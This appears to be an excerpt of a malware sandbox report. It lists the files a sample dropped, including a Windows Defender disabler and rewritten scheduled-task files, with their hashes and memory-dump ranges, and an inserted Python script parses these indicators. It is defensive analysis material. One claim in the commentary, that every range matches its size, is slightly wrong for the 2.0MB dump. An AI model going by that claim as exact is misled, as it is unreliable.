                                                                                                                                                                                                                        9e31c06e2a32d0de8e21e8a8718bb608b8911c374cb245588ec8dd81b1b38a4c

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c230bd5f5a1be2c0416179bd5879095a089807eb680713e93bf2dde4569f42155b9c623fd718ba69dbc9e48e8e750859d6789f8d22d8b05b45ff56cb6b2507f7

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        5fe54cec739665719801cd30e8ea3e1a

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        34ca5bf59dde5ba40358bfd593ee9841610f4562

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        dd509c76bc069e3838bfcb62baa32c883eb2f4cf5089851f0b46b032a87b7f0e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        a10f368e5ed43845e32532e1fae13692323fc9a1fb501297215ddf88bb113a4cf84f28bc0ff3947a953d14e32434016764de755d2628230f5faa708cb5b78317

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        1f545274ba19d9199a78f74cd05e8187

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        4036cf78d3f310af42963c8f16ae27c5922b5dff

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        3b4780cb2e226f4b05643c0b512960e694f21b35bbbe84d5c5e97628e1f8909c

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        b0f66a6c32cb7f2f96b51c141ffe7df7f4fd61a792e6a3756f54b6d0df6f48d7a3bda23d46ee1e18a22ac995520fb9c4ca1b444d204bdd8f3e4b8651f59adc0d

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        15dde0683cd1ca19785d7262f554ba93

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d039c577e438546d10ac64837b05da480d06bf69

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        54522d22658e4f8f87ecb947b71b8feb

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        6a6144bdf9c445099f52211b6122a2ecf72b77e9

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        55f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        22310ad6749d8cc38284aa616efcd100

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        440ef4a0a53bfa7c83fe84326a1dff4326dcb515

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: d8cb3e9459807e35f02130fad3f9860d
  SHA1: 5af7f32cb8a30e850892b15e9164030a041f4bd6
  SHA256: 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
  SHA512: 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: cae60f0ddddac635da71bba775a2c5b4
  SHA1: 386f1a036af61345a7d303d45f5230e2df817477
  SHA256: b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
  SHA512: 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 47605a4dda32c9dff09a9ca441417339
  SHA1: 4f68c895c35b0dc36257fc8251e70b968c560b62
  SHA256: e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a
  SHA512: b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 0b9ebff96ce87bb2948f7decf425a335
  SHA1: 3172582f4a97c15d0c5162c547fe81b811de8e74
  SHA256: 9e2d1f92a7985c38161bb08726c708271673b6644d66b327b72e5023a53daf2c
  SHA512: 4eeaf75114389ca025b6eb589c160f03ddceb2e2c67196f05cdf2da5c946c617816056265a0420dcae13c19781a291ef8c456cd08bca6760bbcdd89a83e96357

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: eb1ad317bd25b55b2bbdce8a28a74a94
  SHA1: 98a3978be4d10d62e7411946474579ee5bdc5ea6
  SHA256: 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
  SHA512: d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 948B
  MD5: 47aec0ae6e0dfab5f91c35cd65d2c56a
  SHA1: 0bbe13618bdc0c402539cdfca81471aa501f5cad
  SHA256: 8f31385012b247db2cc50ecb164208fbbf5f8cdf7bfc951e8c2c8ad5fb04cf0b
  SHA512: c4b7184a85c1d594012ba86390e651439d6cae63c76b94432faaaea410e4ef9bc62d88e68adf8f3abbe36e18ef9e4dc46c3e31a0d72089f98a22f04c8b4a8f12

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 948B
  MD5: 721991167161c45d61b03e4dbad4984b
  SHA1: fd3fa85d142b5e8d4906d3e5bfe10c5347958457
  SHA256: 0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb
  SHA512: f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 948B
  MD5: c1a54dd5a1ab44cc4c4afd42f291c863
  SHA1: b77043ab3582680fc96192e9d333a6be0ae0f69d
  SHA256: c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
  SHA512: 010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 2ad33642f863ae14ee53bc6853ee330e
  SHA1: ca81cc7d8c33a46ebe97bc1d3db55e41a813029e
  SHA256: 17c7b3c895766071a0d87318ec4134a9032ed113b46d3ba75889819a61a9cc19
  SHA512: 52c59a7bde3751e07da53f3942c15cc3e19a4bf1929fbc28ae568ed96531852747b4f724e01438e159c4c98bf2d846db205c48e32f4b5984e9fddeb936eb8aa9

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 1542328a8546914b4e2f1aef9cb42bea
  SHA1: 7a0ac5969dfb20eb974e8a3bd8707243fa68f94f
  SHA256: 7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737
  SHA512: b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: c2725ae3d241d846de6cbcd661b32aaf
  SHA1: 26381f5b9872f011e21da499eb50c467715e23da
  SHA256: 35a882b070c9f98c728af00a387afd3b9473d550a661efce9b8b20b4ad0012df
  SHA512: 6bcae1738dd58c115d713db3a667d3b027a416928036df8b66e397b35b046c9f86d03411cd088c3c056f744ab1e8ee0d97dd1dc5b1ebf0e3d1ccf367c55ee160

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
  MD5: d8b9a260789a22d72263ef3bb119108c
  SHA1: 376a9bd48726f422679f2cd65003442c0b6f6dd5
  SHA256: d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
  SHA512: 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        bd57ad5950df620de68033dd7fa23e15

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        78fe6226353d653b066ada933a55e1712b255c8e

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        8257200487d1bbcbbe82d288574cc19f88700fd7fc157137a8a6dc3bc4c86c6d

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c4cb884c8c07f09f8547869e033998d874e3c83d47e910be1f9f3113a9be0e9384166f57bab20503a05b942fbbda4bb2107fa43f4e943920acd5ed18b448c73a

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        290B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7122fc4b76138ccce53216538ac4a368

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d793320e2b3518783018ca634991ca6f394fd587

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        57183830001d79f2972797dc68794d057ad242367428e774706f318250538562

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        dc01d18d6402019fde68b1d779f66dae5a684fb710d61716076270d91e1604c2ce67e51045bcf65b093e0fb879df41b0c2cca1b125f09ad162b3b44378dd32d5

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5F4E1D90.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        69691c7bdcc3ce6d5d8a1361f22d04ac

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        c63ae6dd4fc9f9dda66970e827d13f7c73fe841c

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        08f271887ce94707da822d5263bae19d5519cb3614e0daedc4c7ce5dab7473f1

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        253405e03b91441a6dd354a9b72e040068b1bfe10e83eb1a64a086c05525d8ccae2bf09130c624af50d55c3522a4fbb7c18cfc8dd843e5f4801d9ad2b5164b12

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9933.tmp\9934.tmp\9935.bat

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        2df9441936169e60a9631bf730cd4273

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        979ee79524023a77b9577d077a3472b87fda9834

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3o3ayfn1.nnz.ps1

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        60B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        15KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        56b2c3810dba2e939a8bb9fa36d3cf96

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        68KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        143b1a26c0fdda10f74ba1b6249e020a

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        30a01b28f4f205bc594f8d6665963eaa49d172e3

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        108KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        22d6b7ab5c8a05162d36d2981b715c28

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69install.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        181KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        b89953da384c6a80b03e5b3abece33c9

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        8495ca680bc958f7b1c5525c2e92200fc9fa1864

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963

                                                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        f313c5b4f95605026428425586317353

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                                                                        SHA256

  129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
  SHA512: b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize: 2KB
  MD5: ceb7caa4e9c4b8d760dbf7e9e5ca44c5
  SHA1: a3879621f9493414d497ea6d70fbf17e283d5c08
  SHA256: 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
  SHA512: 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize: 2KB
  MD5: 7d612892b20e70250dbd00d0cdd4f09b
  SHA1: 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
  SHA256: 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
  SHA512: f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize: 2KB
  MD5: 1e8e2076314d54dd72e7ee09ff8a52ab
  SHA1: 5fd0a67671430f66237f483eef39ff599b892272
  SHA256: 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
  SHA512: 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize: 2KB
  MD5: 0b990e24f1e839462c0ac35fef1d119e
  SHA1: 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
  SHA256: a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
  SHA512: c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
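The dropped-file records above and the memory-dump records that follow are easier to work with once parsed into structured IOC entries. The Python below is an added example, not part of the sandbox report or of any tool the report names; it assumes only the layout visible on this page (a bullet line naming the file or dump, then Filesize/MD5/SHA1/SHA256/SHA512 label lines each followed by a value line, and dump names of the form memory/<pid>-<sequence>-<start>-<end>-memory.dmp). It checks that every hash has the right length for its algorithm (truncated hashes are a common copy-paste defect in IOC lists), that each dump's stated Filesize equals the length of its address range, and it reports address ranges dumped from more than one process and paths that appear more than once with different contents. The sample input is an excerpt of this page's own listing.

```python
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Sample input, excerpted from this page's listing (MD5/SHA1/SHA512 omitted for brevity):
# a bullet line names the file or dump, then label/value line pairs follow.
LISTING = """
• C:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Work
Filesize
2KB
SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
• C:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Work
Filesize
2KB
SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
• memory/3508-577-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize
32KB
• memory/380-622-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp
Filesize
64KB
• memory/616-589-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp
Filesize
64KB
"""

# Dump names encode <pid>-<sequence>-<start>-<end>; the sequence number is not needed here.
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
FIELDS = {"Filesize", "MD5", "SHA1", "SHA256", "SHA512"}
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
SIZE_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}

@dataclass
class Entry:
    name: str
    size: int | None = None                 # bytes, from the Filesize field
    hashes: dict = field(default_factory=dict)
    pid: int | None = None                  # pid/start/end are set for memory dumps only
    start: int | None = None
    end: int | None = None

def parse_size(text: str) -> int:
    """'2KB' -> 2048, '760KB' -> 778240; the report uses binary units."""
    m = re.fullmatch(r"([0-9]+(?:\.[0-9]+)?)\s*([KMG]?B)", text.strip(), re.I)
    assert m, f"unrecognised size: {text!r}"
    return int(float(m.group(1)) * SIZE_UNITS[m.group(2).upper()])

def parse_listing(text: str) -> list[Entry]:
    entries, i = [], 0
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    while i < len(lines):
        line = lines[i]
        if line.startswith("•"):                                  # new entry
            entry = Entry(name=line[1:].strip())
            m = MEM_RE.match(entry.name)
            if m:
                entry.pid, entry.start, entry.end = int(m.group(1)), int(m.group(2), 16), int(m.group(3), 16)
            entries.append(entry)
            i += 1
        elif line in FIELDS and entries and i + 1 < len(lines):  # label line, then its value
            if line == "Filesize":
                entries[-1].size = parse_size(lines[i + 1])
            else:
                entries[-1].hashes[line] = lines[i + 1].lower()
            i += 2
        else:
            i += 1
    return entries

def find_problems(entries: list[Entry]) -> list[str]:
    """Malformed hashes (copy-paste truncation) and dumps whose Filesize disagrees with their range."""
    problems = []
    for e in entries:
        for algo, val in e.hashes.items():
            if len(val) != HASH_LEN[algo] or not re.fullmatch(r"[0-9a-f]+", val):
                problems.append(f"{e.name}: malformed {algo} {val!r}")
        if e.pid is not None and e.size is not None and e.end - e.start != e.size:
            problems.append(f"{e.name}: Filesize {e.size} != range length {e.end - e.start}")
    return problems

def shared_regions(entries: list[Entry]) -> dict[tuple[int, int], list[int]]:
    """(start, end) -> sorted PIDs, for address ranges dumped from more than one process."""
    by_region = defaultdict(set)
    for e in entries:
        if e.pid is not None:
            by_region[(e.start, e.end)].add(e.pid)
    return {r: sorted(p) for r, p in by_region.items() if len(p) > 1}

def rewritten_paths(entries: list[Entry]) -> dict[str, list[str]]:
    """Paths listed more than once with different SHA256, i.e. rewritten during the run."""
    seen = defaultdict(set)
    for e in entries:
        if e.pid is None and "SHA256" in e.hashes:
            seen[e.name].add(e.hashes["SHA256"])
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}
```

Run it with `ents = parse_listing(LISTING)` and then `find_problems(ents)`, `shared_regions(ents)` and `rewritten_paths(ents)`. On the records shown on this page every address range agrees with its stated Filesize; the 64KB range at 0x7FFEAF650000 was dumped from PIDs 380, 616, 672 and 972; the 32KB region at 0x140000000 in PID 3508 sits at the default image base of a 64-bit PE executable; and both UpdateOrchestrator task files appear twice with different hashes, so each was written twice during the run. Whether the sample or the Task Scheduler itself rewrote those task files needs the process tree and file-write events, which this listing alone does not show, so treat those hash pairs as run-specific observations rather than as detection signatures.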

• memory/380-622-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp
  Filesize: 64KB

• memory/380-621-0x000001E917FE0000-0x000001E91800C000-memory.dmp
  Filesize: 176KB

• memory/380-615-0x000001E917FE0000-0x000001E91800C000-memory.dmp
  Filesize: 176KB

• memory/616-588-0x000001AE00030000-0x000001AE0005C000-memory.dmp
  Filesize: 176KB

• memory/616-589-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp
  Filesize: 64KB

• memory/616-582-0x000001AE00030000-0x000001AE0005C000-memory.dmp
  Filesize: 176KB

• memory/616-581-0x000001AE00030000-0x000001AE0005C000-memory.dmp
  Filesize: 176KB

• memory/616-580-0x000001AE00000000-0x000001AE00026000-memory.dmp
  Filesize: 152KB

• memory/672-599-0x0000027962290000-0x00000279622BC000-memory.dmp
  Filesize: 176KB

• memory/672-593-0x0000027962290000-0x00000279622BC000-memory.dmp
  Filesize: 176KB

• memory/672-600-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp
  Filesize: 64KB

• memory/704-626-0x000001F94BC90000-0x000001F94BCBC000-memory.dmp
  Filesize: 176KB

• memory/972-610-0x0000011E067C0000-0x0000011E067EC000-memory.dmp
  Filesize: 176KB

• memory/972-611-0x00007FFEAF650000-0x00007FFEAF660000-memory.dmp
  Filesize: 64KB

• memory/972-604-0x0000011E067C0000-0x0000011E067EC000-memory.dmp
  Filesize: 176KB

• memory/980-23-0x0000000000FD0000-0x0000000000FE8000-memory.dmp
  Filesize: 96KB

• memory/980-1433-0x000000001CC60000-0x000000001CC6A000-memory.dmp
  Filesize: 40KB

• memory/1864-150-0x0000000000810000-0x0000000000841000-memory.dmp
  Filesize: 196KB

• memory/2456-563-0x0000000000BB0000-0x0000000000BB9000-memory.dmp
  Filesize: 36KB

• memory/2456-1554-0x0000000000BB0000-0x0000000000BB9000-memory.dmp
  Filesize: 36KB

• memory/2612-305-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2612-45-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/2864-1555-0x00000000009D0000-0x00000000009D9000-memory.dmp
  Filesize: 36KB

• memory/2864-157-0x00000000009D0000-0x00000000009D9000-memory.dmp
  Filesize: 36KB

• memory/3136-160-0x0000000000810000-0x0000000000841000-memory.dmp
  Filesize: 196KB

• memory/3432-48-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/3432-371-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB

• memory/3508-577-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/3508-576-0x00007FFEEECA0000-0x00007FFEEED5E000-memory.dmp
  Filesize: 760KB

• memory/3508-570-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/3508-569-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/3508-568-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/3508-567-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB

• memory/3508-572-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                      • memory/3508-575-0x00007FFEEF5D0000-0x00007FFEEF7C5000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/3956-17-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

